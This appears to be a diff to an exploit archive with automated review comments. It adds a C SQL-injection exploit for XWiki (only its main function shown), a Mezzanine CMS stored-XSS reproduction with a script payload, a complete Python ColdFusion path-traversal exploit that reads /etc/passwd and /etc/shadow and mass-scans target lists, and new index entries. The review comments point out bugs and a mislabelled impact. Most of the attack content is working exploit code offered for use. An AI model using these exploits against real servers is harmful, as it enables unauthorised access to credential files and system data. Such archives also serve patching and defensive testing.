"⣿⣾⣿⡅⠀⠀⠀⠸⠯⠯⡖⠋⣰⣣⢣⣿⠃⢀⠏⢠⠀⣾⠀⡞⣧⡇⠀⢸⡄⠘⣞⢇⣌⢆⠀⢻⡳⣄⡀⠈⠓⠤⣄⠀⠈⢣⣀⠻⡀⢦⡀⠀⠀⠀⠀⢀⣀⣰⣆⠉⡝⣧⠀⠀⠀\n"
"⣿⢯⣿⠙⢦⠀⠀⠀⠀⣼⢁⣼⢇⢏⡿⠃⠀⡾⠀⡌⢀⡏⢰⡇⣿⢿⡇⢸⠻⠀⢸⡞⣯⡜⢦⠀⢷⠈⢻⡳⢤⡀⠈⠙⠒⠀⠙⢳⣅⠀⠙⣄⠀⠀⢸⣿⣿⣿⣿⣆⢰⣸⡄⠀⠀\n"
"⡏⣼⣿⠒⠒⠤⠤⢤⣸⠃⡼⡛⢸⣼⡇⢠⣠⠁⢸⠁⣼⡇⢸⠀⡿⣿⡇⠸⠀⠀⠀⢻⡘⣧⠘⣇⠘⡆⠀⠹⣦⡈⠓⠦⣄⡀⠀⠀⠉⠳⣄⠈⢇⠀⠐⢿⣿⡛⠟⠋⠀⡇⣧⠀⠀\n"
"⢠⣿⣿⠀⠀⠀⣠⡾⡿⣼⣧⡇⡇⣿⠀⠀⠻⣄⠀⠀⡇⡇⡆⠀⢻⣿⢇⢶⡀⢠⡄⠈⡿⡸⡆⢸⠀⢧⡀⠀⢻⠙⢆⠀⠀⠉⢳⡦⣄⣀⣈⠙⠾⣄⡀⠀⠀⢰⠀⠀⢠⡇⣿⠀⠀\n"
"⣸⣿⣿⣄⣤⣾⠟⢠⡇⡏⣿⡇⣧⣿⠀⣀⡀⠈⣧⠀⡇⡇⡇⢸⢸⣿⢸⣼⢷⡀⠹⣄⠁⢳⡁⠀⡇⢈⢣⠀⠈⡇⠈⢧⡀⠀⠀⢷⡀⢢⠈⢹⡛⠓⠙⠛⠒⠈⡇⠀⠸⡇⣿⠀⠀\n"
"⣿⣿⠟⣩⡞⠁⠀⢸⣷⠀⡟⡇⢸⠋⠻⢷⣝⢦⣿⣆⠀⡇⡇⢸⣾⣿⢼⣿⣼⣳⡄⢹⣧⡀⠁⠀⠗⢸⢸⠀⠀⡇⠀⠀⣷⡀⠀⠀⣷⡈⠀⠀⢧⢘⡀⠀⢀⠀⢸⡀⠀⣇⣿⠀⠀\n"
"⠛⣡⣾⡏⠀⠀⠀⠀⣿⠀⠃⢻⣼⡀⣠⡄⠙⠿⡟⢹⠘⣿⠁⠀⠀⣿⠀⢻⠈⡏⠻⡄⢿⢳⡀⠀⢀⡟⠸⡇⠀⢸⠀⠀⢸⣷⡀⠀⢳⠳⡀⠀⠸⡎⡇⠀⠸⡇⠀⢷⠀⢹⠇⠀⠀\n"
"⣴⣿⣿⡇⠀⠀⠀⠀⠸⣆⠀⠘⡿⣿⣿⣅⡀⢀⠟⠸⠀⢻⡥⠀⠀⣿⡄⢸⣆⣱⣀⠙⣦⢯⢳⠀⣸⢧⡇⣿⠀⠸⠀⠀⣸⣇⢳⠀⠘⢇⢹⡀⠀⣇⠃⠀⠀⡇⠀⡌⢷⡈⣆⠀⠀\n"
"⣿⣿⣿⡇⠀⠀⠀⠀⠀⠹⣄⢠⣿⣿⠟⠋⣵⠏⠀⠀⠀⠸⡇⠈⠙⡟⠛⢺⡷⣶⣯⣭⣈⣿⡟⡇⡟⡼⡇⣿⠀⡇⠀⢀⣿⡞⠚⡀⣼⠘⠆⣇⠀⢸⠀⠀⢀⡇⠀⠁⢀⡷⣜⣄⠀\n"
"⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠘⢺⡏⢿⣤⠞⠁⠀⠀⠀⠀⠀⣷⠀⠀⠀⠀⠸⡇⠀⢳⠈⠙⠻⢿⣿⢀⣧⡇⣿⣰⠃⢀⣾⣿⣵⠀⣠⠏⡇⠀⣿⠀⡎⢠⣠⣼⡇⠀⢸⢿⡇⠘⠻⣄\n"
"⣿⣿⣿⠒⠒⠒⠒⠒⠒⠒⠀⢸⡇⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⣴⠈⠃⠀⠀⣸⠏⣼⡸⡟⣳⠃⢀⡞⣏⢋⣼⡟⠁⠀⡇⢠⠏⣸⣱⣾⣟⡿⡡⢀⡿⡿⡇⠀⠀⠈ \n"
"⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠘⣇⠀⠀⢹⡦⠤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⡟⠀⠀⠀⣰⠏⠀⢃⢧⡷⠃⣠⠏⠀⠉⡾⢹⢻⠀⡶⠣⠎⢀⣾⣻⠿⣸⠛⢡⡞⣼⠁⠱⠀⠀\n"
"⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⡇⠀⠀⠖⠁⠀⠀⠞⡞⢁⣴⠥⠖⠛⢿⢷⣾⡾⡆⣿⣶⣋⣾⣿⣏⠀⢹⡾⠋⢰⠁⠀⠀⠀⠀⠀\n"
"⣿⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣇⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⡿⠁⠀⠀⠀⠀⠀⢀⣼⣵⡞⠁⢀⡔⠀⣿⣁⣼⠅⣧⠁⠘⣿⡼⠋⢸⡆⠀⢷⢸⠀⠀⠀⠀⠀⠀⠀\n"
"⡏⠈⠉⠲⣄⡀⠀⠀⢀⣀⣤⣶⣿⣿⠀⢈⠙⠶⢦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⠁⢸⠃⢉⡿⠀⠀⢸⣽⠃⠀⠹⣄⣼⠷⠃⠀⠀⢳⠀⠘⣯⢧⠀⠀⠀⠀⠀⠀\n"
"⣤⣤⣤⣤⣤⣽⣷⣿⣿⣿⣿⣿⣿⣿⡇⠀⠙⠲⣤⠈⠙⠲⣤⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣬⣤⠤⠖⠚⠛⠉⠀⠀⠀⠀⣿⠀⠀⠀⣿⠁⠀⠀⠀⢀⣼⠃⢰⡏⠀⠁⠀⠀⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡼⠁⠀⠀⣼⠙⠂⠀⣀⡶⠋⢀⣠⠞⠁⠀⠀⠀⠀⠀⠀⠀\n "
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠴⠚⠉⠀⠀⢀⡴⠁⠀⣠⠞⢁⣴⢾⣯⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⣀⣀⣀⣀⣀⣀⡠⢤⠞⠁⠀⠀⠀⠀⠀⠀⢀⣠⠤⠞⠋⢁⣀⣠⠤⠴⠚⠉⣀⣠⠜⢁⡴⣿⣧⣸⣿⣿⣿⣿⣿⣷⣶⣶⣦⣤⣄ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠻⣅⠀⠀⠀⠀⡞⠀⠀⠀⠀⠀⢀⣠⠖⠋⠁⠀⠒⠊⠉⠁⠀⠀⠀⢀⣀⣭⣤⡖⢋⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠈⠓⠦⣄⣸⠁⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⣀⡤⠴⢺⣿⣿⣿⣿⣿⣿⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⢻⣀⣀⡤⠴⠶⠶⠶⠶⠦⢤⣤⠖⠋⠁⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⡞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣀⡤⠴⠶⠶⠶⢤⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⡴⠋⠁⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀\n"
);
const char *name = "\e[1;37m\t\t\t[ Byte Reaper ]\e[0m\n";
int s = 0;
while (name[s] != '\0')
{
printf("%c", name[s]);
fflush(stdout);
usleep(100000);
s++;
}
printf("---------------------------------------------------------------------\n");
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&yourUrl,
"Target Url (Base URL)"),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!yourUrl)
{
printf("\e[1;31m[-] Please Enter Your Url !\e[0m\n");
printf("\e[1;31m[-] Ex : ./exploit -u http://URL\\e[0mn");
printf("\e[1;31m[-] Exit Syscall\e[0m\n");
exitAssembly();
}
checkWaf(yourUrl);
printf("---------------------------------------------------------------------\e[0m\n\n");
printf("[+] Start Exploit Sql...\e[0m\n");
if (cookies)
{
selecetCookie = 1;
}
if (verbose)
{
verbose = 1;
}
injection(yourUrl);
return 0;
}
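Review bot: In `injection`, `strstr(response.buffer, word[w])` dereferences a NULL pointer whenever a 2xx response arrives with an empty body, because `response.buffer` stays NULL until `write_cb` has appended data, and the trailing `""` entry in `word[]` matches every non-empty body, so the "vulnerability CVE-2025-32429 exists" line is printed for any 2xx response regardless of its content; guard with `if (response.buffer == NULL) continue;` before the word loop and drop the empty sentinel. `response.len` is a `size_t` but is printed with `%d` twice in `injection` (`checkWaf` already uses `%zu`), which is undefined behaviour on LP64 targets. The response buffer is also never reset between payload iterations, so each later search runs over the concatenation of all previous responses and the reported length keeps growing. The `headers` list built in `injection` is freed but never attached with `CURLOPT_HTTPHEADER`, unlike in `checkWaf`, so those three headers are never sent.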


@ -0,0 +1,33 @@
# Exploit Title: Mezzanine CMS 6.1.0 Stored Cross Site Scripting (XSS)
via component /blog/blogpost/add
# Date: 23/07/2025
# Exploit Author: Kevin Dicks
# Vendor Homepage: https://github.com/stephenmcd/mezzanine
# Software Link: https://github.com/stephenmcd/mezzanine
# Version: 6.1.0
# Category: Web Application
# Tested on: Ubuntu Server 20.04.6 LTS (Focal Fossa), Firefox browser
version 136.0 (64-bit)
# CVE : CVE-2025-50481
# Exploit link : https://github.com/kevinpdicks/Mezzanine-CMS-6.1.0-XSS
## Summary:
A cross-site scripting (XSS) vulnerability in the component
/blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute
arbitrary web scripts or HTML via injecting a crafted payload into a
blog post.
## Reproduction Steps:
1. Login to the admin portal.
2. Create a new blog post.
3. Insert source code, and enter the following payload:
```
<script>alert(document.location)</script>
```
4. Save the new blog post.
5. The blog post is published, and can be accessed by any user.
6. Stored XSS is executed.
--


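--- a/exploits/multiple/webapps/52387.py
+++ b/exploits/multiple/webapps/52387.py
@@ -0,0 +1,168 @@
+# Exploit Title: Adobe ColdFusion 2023.6 - Remote File Read
+# Exploit Author: @İbrahimsql
+# Exploit Author's github: https://github.com/ibrahmsql
+# Description: ColdFusion 2023 (LUcee) - Remote Code Execution
+# CVE: CVE-2024-20767
+# Vendor Homepage: https://www.adobe.com/
+# Requirements: requests>=2.25.0, urllib3>=1.26.0
+# Usage: python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+import os
+import re
+import urllib3
+import requests
+import argparse
+from urllib.parse import urlparse
+from concurrent.futures import ThreadPoolExecutor, as_completed
+urllib3.disable_warnings()
+class ColdFusionExploit:
+def __init__(self, output_file=None, port=8500):
+self.output_file = output_file
+self.port = port
+self.verbose = True
+self.session = requests.Session()
+def print_status(self, message, status="*"):
+colors = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"}
+reset = "\033[0m"
+print(f"{colors.get(status, '')}{status} {message}{reset}")
+def normalize_url(self, url):
+if not url.startswith(('http://', 'https://')):
+url = f"http://{url}"
+parsed = urlparse(url)
+if not parsed.port:
+url = f"{url}:{self.port}"
+return url.rstrip('/')
+def get_uuid(self, url):
+endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
+try:
+response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10)
+if response.status_code == 200:
+match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text)
+if match:
+uuid = match.group(1)
+if self.verbose:
+self.print_status(f"UUID: {uuid[:8]}...", "+")
+return uuid
+except Exception as e:
+if self.verbose:
+self.print_status(f"Error: {e}", "-")
+return None
+def read_file(self, url, uuid, file_path):
+headers = {"uuid": uuid}
+endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100"
+try:
+response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10)
+if response.status_code == 200 and response.text.strip() != "[]":
+return response.text
+except:
+pass
+return None
+def test_files(self, url, uuid):
+files = {
+"Linux": ["etc/passwd", "etc/shadow", "etc/hosts"],
+"Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"]
+}
+for os_name, file_list in files.items():
+for file_path in file_list:
+content = self.read_file(url, uuid, file_path)
+if content:
+self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+")
+if self.verbose:
+print(content[:200] + "..." if len(content) > 200 else content)
+print("-" * 50)
+if self.output_file:
+with open(self.output_file, "a") as f:
+f.write(f"{url} - {os_name} - {file_path}\n")
+return True
+return False
+def exploit_custom_file(self, url, uuid, custom_file):
+content = self.read_file(url, uuid, custom_file)
+if content:
+self.print_status(f"File read: {custom_file}", "+")
+print(content)
+return True
+else:
+self.print_status(f"Failed to read: {custom_file}", "-")
+return False
+def exploit(self, url, custom_file=None):
+url = self.normalize_url(url)
+if self.verbose:
+self.print_status(f"Testing: {url}")
+uuid = self.get_uuid(url)
+if not uuid:
+if self.verbose:
+self.print_status(f"No UUID: {url}", "-")
+return False
+if custom_file:
+return self.exploit_custom_file(url, uuid, custom_file)
+else:
+return self.test_files(url, uuid)
+def scan_file(self, target_file, threads):
+if not os.path.exists(target_file):
+self.print_status(f"File not found: {target_file}", "-")
+return
+with open(target_file, "r") as f:
+urls = [line.strip() for line in f if line.strip() and not line.startswith('#')]
+self.print_status(f"Scanning {len(urls)} targets with {threads} threads")
+self.verbose = False
+vulnerable = 0
+with ThreadPoolExecutor(max_workers=threads) as executor:
+futures = {executor.submit(self.exploit, url): url for url in urls}
+for future in as_completed(futures):
+url = futures[future]
+try:
+if future.result():
+vulnerable += 1
+print(f"[+] {url}")
+else:
+print(f"[-] {url}")
+except Exception as e:
+print(f"[!] {url} - Error: {e}")
+self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+")
+def main():
+parser = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit")
+parser.add_argument("-u", "--url", help="Target URL")
+parser.add_argument("-f", "--file", help="File with target URLs")
+parser.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)")
+parser.add_argument("-c", "--custom", help="Custom file to read")
+parser.add_argument("-o", "--output", help="Output file")
+parser.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)")
+parser.add_argument("-q", "--quiet", action="store_true", help="Quiet mode")
+args = parser.parse_args()
+if not args.url and not args.file:
+parser.print_help()
+return
+exploit = ColdFusionExploit(args.output, args.port)
+exploit.verbose = not args.quiet
+if args.url:
+exploit.exploit(args.url, args.custom)
+elif args.file:
+exploit.scan_file(args.file, args.threads)
+if __name__ == "__main__":
+main()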
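Review bot: The header's `# Description: ColdFusion 2023 (LUcee) - Remote Code Execution` contradicts the title, the files.csv entry ("Remote File Read") and the code itself, since read_file only returns the response text of the logging endpoint and nothing in the script executes anything on the target; it should read `# Description: ColdFusion 2023.6 - Remote File Read (CVE-2024-20767)` so anyone triaging the entry is not told the impact is RCE. Separately, the bare `except: pass` in read_file swallows every exception, including KeyboardInterrupt and connection timeouts, so in scan_file a host that simply timed out is printed as `[-]` exactly like a genuine negative; narrowing it to `except requests.RequestException as e:` and reporting the error when self.verbose is set keeps scan results honest. The `#!/usr/bin/env python3` line sits ninth in the file and therefore has no effect as a shebang; it belongs on line 1 or should be dropped.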


@ -7460,6 +7460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux,,2003-06-16,2012-11-17,1,CVE-2003-0388;OSVDB-9027,,,,,https://www.securityfocus.com/bid/7929/info
14273,exploits/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",local,linux,,2010-07-08,2010-07-10,1,CVE-2010-0832;OSVDB-66116,,,,,
14339,exploits/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,local,linux,,2010-07-12,2010-07-12,1,CVE-2010-0832,,,,,
52386,exploits/linux/local/52386.py,"Linux PAM Environment - Variable Injection Local Privilege Escalation",2025-07-28,İbrahimsql,local,linux,,2025-07-28,2025-07-28,0,CVE-2025-6018,,,,,
35021,exploits/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,local,linux,,2014-10-20,2014-10-20,1,CVE-2011-1485;OSVDB-72261,"Metasploit Framework (MSF)",,,,
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,,2019-10-24,2019-10-24,1,CVE-2019-13272,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb
23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - Chroot Breakout",2004-02-06,"Markus Mueller",local,linux,,2004-02-06,2016-09-06,1,CVE-2004-2073;OSVDB-3875,,,,,https://www.securityfocus.com/bid/9596/info
@ -10400,6 +10401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
8337,exploits/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,dos,multiple,,2009-03-31,2016-09-29,1,OSVDB-54002;OSVDB-54001;OSVDB-54000,,,,,
52382,exploits/multiple/dos/52382.txt,"Xlight FTP 1.1 - Denial Of Service (DOS)",2025-07-28,"Fernando Mengali",dos,multiple,,2025-07-28,2025-07-28,0,CVE-2024-0737,,,,,
44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,,2018-06-06,2018-06-06,1,CVE-2018-4241,"Heap Overflow",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1558
8148,exploits/multiple/dos/8148.pl,"Yaws < 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities",2009-03-03,"Praveen Darshanam",dos,multiple,,2009-03-02,,1,OSVDB-52408;CVE-2009-0751,,,,,
32104,exploits/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",dos,multiple,,2008-07-21,2014-03-09,1,CVE-2008-3314;OSVDB-47124,,,,,https://www.securityfocus.com/bid/30340/info
@ -11742,6 +11744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
52208,exploits/multiple/webapps/52208.py,"Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)",2025-04-15,"Eui Chul Chung",webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-50672,,,,,
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
52387,exploits/multiple/webapps/52387.py,"Adobe ColdFusion 2023.6 - Remote File Read",2025-07-28,İbrahimsql,webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2024-20767,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,,
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,,
@ -12092,6 +12095,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
52383,exploits/multiple/webapps/52383.txt,"Invision Community 4.7.20 - (calendar/view.php) SQL Injection",2025-07-28,"Egidio Romano",webapps,multiple,,2025-07-28,2025-07-28,1,CVE-2025-48932,,,,,
44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80,2018-06-20,2018-11-17,0,CVE-2018-10956,"Metasploit Framework (MSF)",,,http://www.exploit-db.comipc-orchid-x86_64_2.0.5-jessie.deb,https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80,2018-06-20,2018-11-17,0,CVE-2018-10956,Traversal,,,http://www.exploit-db.comipc-orchid-x86_64_2.0.5-jessie.deb,https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple,,2004-11-30,2013-03-15,1,CVE-2004-1210;OSVDB-12243,,,,,https://www.securityfocus.com/bid/11779/info
@ -12200,6 +12204,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36419,exploits/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",webapps,multiple,3790,2015-03-17,2016-10-10,1,OSVDB-119612,"Metasploit Framework (MSF)",,,,
18012,exploits/multiple/webapps/18012.txt,"Metasploit Web UI 4.1.0 - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple,,2011-10-20,2020-08-22,1,OSVDB-80287,,,,,http://www.rul3z.de/advisories/SSCHADV2011-033.txt
39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEBlog - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple,,2016-05-17,2016-05-17,0,CVE-2016-2296,"Metasploit Framework (MSF)",,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
52385,exploits/multiple/webapps/52385.txt,"Mezzanine CMS 6.1.0 - Stored Cross Site Scripting (XSS)",2025-07-28,"Kevin Dicks",webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2025-50481,,,,,
39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80,2016-03-23,2016-03-23,0,,,,,,http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
51543,exploits/multiple/webapps/51543.c,"Microsoft SharePoint Enterprise Server 2016 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",webapps,multiple,,2023-06-26,2023-06-26,0,CVE-2023-28288,,,,,
48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,,2020-08-27,2020-08-27,0,CVE-2020-15920,,,,,
@ -12570,6 +12575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
52384,exploits/multiple/webapps/52384.c,"XWiki 14 - SQL Injection via getdeleteddocuments.vm",2025-07-28,"Byte Reaper",webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2025-32429,,,,,
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,,2021-01-18,2021-01-18,0,,,,,,
52136,exploits/multiple/webapps/52136.txt,"XWiki Platform 15.10.10 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24893,,,,,
17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple,,2011-04-04,2016-10-27,0,OSVDB-78072;OSVDB-71717;OSVDB-71716;CVE-2011-5025;OSVDB-71715,,,,http://www.exploit-db.comyaws-1.88.tar.gz,https://sitewat.ch/en/Advisory/4
